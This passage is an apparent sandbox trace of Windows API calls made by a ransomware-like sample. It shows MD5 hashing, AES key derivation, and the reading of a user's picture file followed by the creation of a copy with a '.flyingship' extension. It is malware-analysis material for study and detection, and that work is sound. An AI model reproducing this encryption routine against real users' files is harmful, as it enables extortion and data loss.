hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.049] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.049] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.049] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.049] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.049] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.050] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.050] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.050] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.050] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.050] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.051] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.051] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.051] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.051] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.051] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0191.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.052] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0191.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.052] CryptDestroyHash (hHash=0x90af58) returned 1 [0191.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\_jwe.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.053] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.053] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.053] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.054] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0191.054] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0191.054] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0191.054] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0191.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0191.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0191.055] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.055] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.056] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0191.056] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh")) returned 0x10 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0191.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0191.057] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\_jwe.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.059] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0191.059] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0191.059] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0191.059] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0191.060] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.060] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x542a, lpOverlapped=0x0) returned 1 [0191.063] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0191.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x542a) returned 0x900190 [0191.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x542a) returned 0xbea018 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.064] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x542a) returned 0x900190 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0191.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.065] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0191.065] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.065] 